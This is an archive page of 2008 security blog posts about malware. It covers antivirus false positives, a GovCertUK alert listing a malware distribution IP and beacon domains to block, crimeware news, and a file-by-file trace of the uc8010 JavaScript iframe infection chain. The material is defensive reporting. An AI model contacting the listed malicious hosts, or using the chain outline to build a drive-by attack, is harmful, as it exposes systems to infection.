Archive for Malware
Author: Dave Lewis
February 7, 2008 at 11:32 am · Filed under Malware
I tend to get a little grumpy with antivirus products these days. Now, before I type another word, all of you sales folks from av vendors, this is not an invitation to beat my door down.
Today I have a new fun. When loading up my Google.ca search page I was presented with a virus found warning.
Crap.Flippin.Crap
So, I pull the cable and dig into what could be the culprit. Hmmm, nothing there. Nope, nothing over there. OK, this is weird. Called Myrcurial. Could he see the same behaviour? Nope.
Sigh. (a pause) No. Not again.
The file in question? http://www.google.ca/logos/lunarnewyear08.gif
The file causing the problem was the title image on Google’s home page.
Oh FFS.
Google 1, Heuristics 0.
Kung Hei Fat Choi.
Tags: False Google Malware, Kung Hei Fat Choi
Author: Dave Lewis
January 28, 2008 at 9:52 am · Filed under Malware
OK, so I must admit I’m starting to become more annoyed with anti virus vendors as the days go on. Today the vendor of choice on my day job computer decided to catch the malicious code I had on my system.
Wunderbar!
Wait, wait…no. Last time I check Ollydbg is not a trojan. It seems my AV client is getting dumber by the day. More and more the AV is “catching” shadows on the side walk. It sees what “might” be malicious code and sounds the alarm. But, time and again it is a legitimate file with no virus/trojan/remailer/et cetera to be found. And I am getting tired of it. Every time one of these false alarms is sounded there is a triage exercise that is initiated and the ensuing investigation. All of this takes time and well, lets be honest, money. The costs of these types of investigations are mounting and I’m getting a little tired of it.
What’s your malware detection client of choice and why? Care to share?
[UPDATE] Feb 6, 2008 Billy Hoffman has noticed some interesting behaviour as well.
Tags: Antivirus, Malware, False Positives
Author: Dave Lewis
January 21, 2008 at 7:39 am · Filed under Malware
This morning I see that the malicious software purveyors are still in fine form. It would be nice if they would take a weekend off (or longer, much longer). The UK government CERT has put out an alert at the end of last week regarding a domain originating from Hotfresh ISP, Hong Kong, that is distributing malware. This seems to have first appeared on the 15th of this month. No word at this point as to the nature of the malicious code or whether AV vendors have detection available for it.
From Gov CertUK:
GovCertUK have detected a number of systems downloading malicious software from the IP address 58.65.238.59. The malware can be detected by analysing web traffic logs for outbound traffic to this IP address. Evidence of the IP address 58.65.238.59 within web traffic logs may indicate an infected computer on the network. Other identifying features of this malware include:
•On occasion the IP address may resolve to the domain name of dorifora(dot)com.
•The HTTP GET request to the IP/domain in question will not have an initial referrer listed.
•Once the malware is present on the network, it beacons out to the domain here4search(dot)biz – this domain may also be present within the web logs.
GovCertUK recommend that the IP address 58.65.238.59 is blocked on the network as well as the domains dorifora(dot)com and here4search(dot)biz.
GovCertUK would like to hear from anyone that discovers evidence of this malware on their system. GovCertUK can be contacted on the details provided at the end of this advisory.
Check your logs for outbound traffic to the aforementioned IP address.
(thx fuzzE1 for the tip)
Article Link (.pdf)
Tags: GovCertUK, dorifora, searchmeup, here4search, Malware, Trojan
Author: Dave Lewis
January 14, 2008 at 8:35 am · Filed under Crime, Malware
A new toolkit has been released in the underground circles according to the folks at Finjan Inc. who have been keeping an eye on the spreading crimeware. The new software has spread to more than 10,000 sites in the past few weeks. The Javascript based malware is generated dynamically and changes each time it is accessed in an effort to avoid detection.
Loverly.
From the press release:
Malicious Code Research Center (MCRC) has identified yet another significant new web attack — the latest in a genre of crimeware that threatens to turn highly trusted web sites into insidious traps for unwary visitors. More than 10,000 websites in the US were infected in December by this latest malware. The attack, which Finjan has designated “random js toolkit,” is an extremely elusive crimeware Trojan that infects an end user’s machine and sends data from the machine via the Internet to the Trojan’s “master”, a cybercriminal. Data stolen by the Trojan can include documents, passwords, surfing habits, or any other sensitive information of interest to the criminal.
For the rest of the story follow the link.
Article Link
Tags: Malware, Crimeware, Crime Toolkit, Random JS Toolkit
Author: Dave Lewis
January 12, 2008 at 6:34 pm · Filed under Malware
Ouch. MySpace is back in the news and not in a pleasant light. It appears that some hackers were leveraging the popular social networking site for distributing malware. The trojan software in question is a fake Microsoft update.
From PC World:
Web surfers are presented with what appears to be a popup window advising them to download the latest version of Microsoft’s Windows Malicious Software Removal Tool, which was just released this Tuesday. This software is distributed by Microsoft to help Windows users rid their systems of malware.
In reality, the popup window is just part of a larger image that takes up most of the computer screen. If the user clicks anywhere on this image, his computer will then begin to download the Trojan program.
The Trojan, known as TFactory, is a well-known piece of code that has been used by criminals for well over a year, according to Dave Marcus, a security research manager with McAfee.
More reason to be sure that your antivirus software is up to date and your patches are applied…from the source.
Article Link
Tags: MySpace Trojan, MySpace, MySpace Malware, TFactory
Author: Dave Lewis
January 8, 2008 at 5:19 pm · Filed under Exploit, Malware
OK, so now that I have my home machine I can dig into the anatomy of the uc8010[dot]com hack’s javascript.
First off after a site has been infected a web user that surfs to a hosted page will have a javascript file, typically named “0.js”, executed in an unprotected system as well as setting a cookie. This then calls an iframe and another javascript file that (in the instance I tested) was called “w.js”. It is this file which has an “eval” function that launches the exploit.
This second file (w.js) would launch another iframe that would call a counter from cnzz[dot]com as well as calling a third javascript file called “007.js”.
Smart ass.
This last javascript file would create another iframe that would call a page from mywordmyspace[dot]cn. This would in return with a script file that called another counter from a site called 51yes[dot]com.
The first counter I presume to announce to the hacker that a successful breach occurred and the second to indicate a payload delivered.
This is by no means an exhaustive test. I’ve only started teasing it apart.
Tags: uc8010, SQL Hack, Javascript, iframe
Author: Dave Lewis
December 28, 2007 at 8:59 am · Filed under Malware
The holiday has dragged Storm worm back out for some more “smashy, smashy”. If you receive an email like the one above which arrived in our media email this morning do not click on it. That might seem self evident to some but, this malware continues to spread for a reason. A couple of the domains being used to spread the malware are happycards2008.com or newyearcards2008.com. This time around the creators of the storm worm have added a rootkit in an effort to avoid detection and to distribute the workload.
From Computer World:
Fortunately, said Giuliani, the rootkit is relatively old, and thus detectable by at least some security software. Neither is the move by Storm’s makers to hide its components and operations from anti-virus programs a new thing: the Trojan began using rootkits months ago.
Giuliani also wondered why the domains hosting the Trojan had not been taken down. “If the attack is currently known and security companies are updating their software, why are these fake domains still active?” he asked in a post to the Prevx company blog. “If servers behind [these] sites are constantly changing so that it would be impossible to shut them down, these servers are reached by four well-known domains. Why, after four days, hasn’t anyone successfully taken these domains down?”
That’s an easy one to answer. It’s the holiday season. No one home.
I didn’t say it was a good answer.
Article Link
Tags: Storm Worm, Holiday Email Malware
Author: Dave Lewis
December 21, 2007 at 10:34 am · Filed under Malware
Tell us something we didn’t know. This article comes to us from the Register UK:
Antivirus software is getting worse at protecting users from new threats, according to two reports which found malware authors are getting better at disguising their creations.
German computer magazine c’t studied 17 antivirus programs and exposed them to completely new samples of malware. What they found wasn’t encouraging. Detection rates sank to 20-30 per cent, from 40-50 per cent in a similar test last year.
The c’t researchers also created variants of known viruses and found that virtually all of the scanners missed at least some of them.
The fact that the variants could get past a lot of the filters doesn’t really surprise me. In a lot of ways this is expected (although not welcome) behaviour. Most scanning is based on signatures. If you pad one of the payloads to be longer or shorter it is very possible that it will be undetected. This is exactly why Code Red was able to spread undetected by intrusion detection systems and AV alike in the beginning. By adding 100 bytes to the payload it outstripped the signature. Another problem that this testing showed is that the heuristics for a lot of the vendor offerings is immature at this point. I have seen enough instances of false positives in several vendor products to come to that conclusion.
It won’t take long before the vendors are crying foul. Lord knows that Chinese users won’t find much sympathy for the AV crowd.
Hope springs. Current AV is still better than the alternative.
On a side note, I know a user that refuses to use anti-virus of any kind. No firewall et cetera. He maintains that it is a waste of money. Then his computer invariably slowwws down. So, what does he do? Get AV? Nope. He THROWS THE COMPUTER OUT! That works for me as I plan to be in front of his house when he pitches his tricked out machine with dual core processors and 4 GB of RAM. Oh yeah, and he’ll pitch the monitor as well. A 21″ flat screen.
Free is good.
Article Link
Tags: Anti-Virus, Antivirus, Malware, Heuristics, c’t
Author: Dave Lewis
December 21, 2007 at 7:09 am · Filed under Crime, Malware
From Kaspersky’s Viruslist.com:
Today Nikolay Patrushev, head of the Federal Security Services, announced the results of the measures taken to combat cyber crime in 2007.
Among other information, it was announced that it had been established who was the author of the notorious Pinch Trojan - two Russian virus writers called Ermishkin and Farkhutdinov. The investigation will soon be completed and taken to court.
It’s well known that Pinch is one of the most popular Trojan programs with Russian malicious users. The Trojan makes it possible to steal email, icq and other account data, including to network services and application. The authors of this program, also known as Damrai and Scratch, used Pinch to build a criminal industry.
Anyone who wants can order a customized version of the Trojan, and also get ‘technical support’ from the authors of the program. Russian hacker forums were flooded with advertisements for this ’service’.
I wonder if they will be able to ferret out other writers such as the creators of Mpack?
Article Link
Tags: Pinch, Pinch Trojan, Malware, Russian Police
Author: Dave Lewis
December 17, 2007 at 11:13 am · Filed under Crime, Malware
Here is an interesting write up from C|Net on the malware underground.
From C|Net:
“Over the years, the criminal elements, the ones who are making money, making millions out of all this online crime, are just getting stronger and stronger. I don’t think we are really winning this war.”
As director of antivirus research for F-Secure, you might expect Mikko Hypponen to overplay the seriousness of the situation. But according to the Finnish company, during 2007 the number of samples of malicious code on its database doubled, having taken 20 years to reach the size it was at the beginning of this year.
There seems to be some serious evidence then for the idea of an evolution from hacking and virus writing for fun to creating malicious code for profit. Security experts are increasingly pointing to the existence of a “black” or “shadow” cybereconomy, where malware services are sold online using the same kinds of development methods and guarantees given by legitimate software vendors.
It is difficult to establish exactly how organized this malware economy is but, according to David Marcus, security research manager at McAfee Avert Labs, it’s relatively straightforward to buy not only the modules to build malware, but also the support services that go with it.
Article Link
« Previous entries ·
Next entries »
Explore
Security Bloggers Network
